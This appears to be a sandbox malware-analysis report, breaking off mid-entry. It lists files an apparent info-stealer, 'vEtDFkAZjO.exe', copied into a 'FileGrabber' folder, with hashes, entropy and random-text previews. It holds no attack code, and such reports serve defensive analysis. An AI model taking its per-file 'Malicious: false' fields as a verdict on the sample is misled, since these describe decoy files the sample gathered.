Preview:	NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\UMMBDNEQBN\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\UMMBDNEQBN\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
SHA-512:	CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
Malicious:	false
Preview:	HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\UMMBDNEQBN\KATAXZVCPS.xlsx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.699548026888946
Encrypted:	false
SSDEEP:	24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
MD5:	A0DC32426FC8BF469784A49B3D092ADC
SHA1:	0C0EEB9B226B1B19A509D9864F8ADC521BF18350
SHA-256:	A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
SHA-512:	DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
Malicious:	false
Preview:	KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\UMMBDNEQBN\LTKMYBSEYZ.png

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687722658485212
Encrypted:	false
SSDEEP:	24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
MD5:	9A59DF7A478E34FB1DD60514E5C85366
SHA1:	DE10B95426671A161E37E5CE1AD6424AB3C07D98
SHA-256:	582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
SHA-512:	70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
Malicious:	false
Preview:	LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\UMMBDNEQBN\UMMBDNEQBN.docx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695685570184741
Encrypted:	false
SSDEEP:	24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
MD5:	A28F7445BB3D064C83EB9DBC98091F76
SHA1:	D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
SHA-256:	10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
SHA-512:	42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
Malicious:	false
Preview:	UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\YPSIACHYXW.jpg

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.700014595314478
Encrypted:	false
SSDEEP:	24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
MD5:	960373CA97DEDBA8576ECF40D0D1E39D
SHA1:	E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
SHA-256:	501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
SHA-512:	93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
Malicious:	false
Preview:	YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

C:\Users\user\AppData\Local\138727\FileGrabber\Documents\desktop.ini

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	402
Entropy (8bit):	3.493087299556618
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
MD5:	ECF88F261853FE08D58E2E903220DA14
SHA1:	F72807A9E081906654AE196605E681D5938A2E6C
SHA-256:	CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
SHA-512:	82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

C:\Users\user\AppData\Local\138727\FileGrabber\Downloads\DVWHKMNFNN.jpg

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\138727\FileGrabber\Downloads\DVWHKMNFNN.xlsx

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694985340190863
Encrypted:	false
SSDEEP:	24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
MD5:	C9386BC43BF8FA274422EB8AC6BAE1A9
SHA1:	2CBDE59ADA19F0389A4C482667EC370D68F51049
SHA-256:	F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
SHA-512:	7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
Malicious:	false
Preview:	DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

C:\Users\user\AppData\Local\138727\FileGrabber\Downloads\HTAGVDFUIE.pdf

Download File

Process:	C:\Users\user\Desktop\vEtDFkAZjO.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692693183518806
Encrypted:	false
SSDEEP:	24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
MD5:	78F042E25B7FAF970F75DFAA81955268
SHA1:	F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
SHA-256:	E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
